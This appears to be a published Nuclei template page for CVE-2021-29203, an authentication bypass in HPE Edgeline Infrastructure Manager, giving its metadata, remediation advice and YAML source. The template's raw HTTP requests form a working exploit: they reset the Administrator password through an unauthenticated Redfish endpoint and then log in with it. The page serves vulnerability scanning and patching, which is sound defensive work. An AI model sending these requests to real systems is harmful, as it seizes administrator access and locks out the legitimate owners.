HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass

ID: CVE-2021-29203

Severity: critical

Author: madrobot

Tags: cve2021,cve,hpe,bypass,tenable,hp

Description

HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.

YAML Source

id: CVE-2021-29203

info:
  name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
  author: madrobot
  severity: critical
  description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, unauthorized configuration changes, or disruption of the affected system.
  remediation: |
    Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2021-15
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
    - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-29203
    cwe-id: CWE-306
    epss-score: 0.95563
    epss-percentile: 0.99393
    cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: edgeline_infrastructure_manager
  tags: cve2021,cve,hpe,bypass,tenable,hp

http:
  - raw:
      - |
        PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"Password":"{{randstr}}"}
      - |
        POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"UserName":"Administrator","Password":"{{randstr}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "X-Auth-Token"
          - "PasswordReset"
          - "Location"
        condition: and

      - type: word
        part: body
        words:
          - "Base.1.0.Created"

      - type: status
        status:
          - 201
# digest: 4b0a00483046022100c9833d1718f58c2e148cb6215866b923ab1a075b4c10802ddec145b2607731b0022100c9e0a85b3c772a27c2ee2e60132c8ce45246f90263725557cdfa16e184785456:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-29203.yaml"

View on Github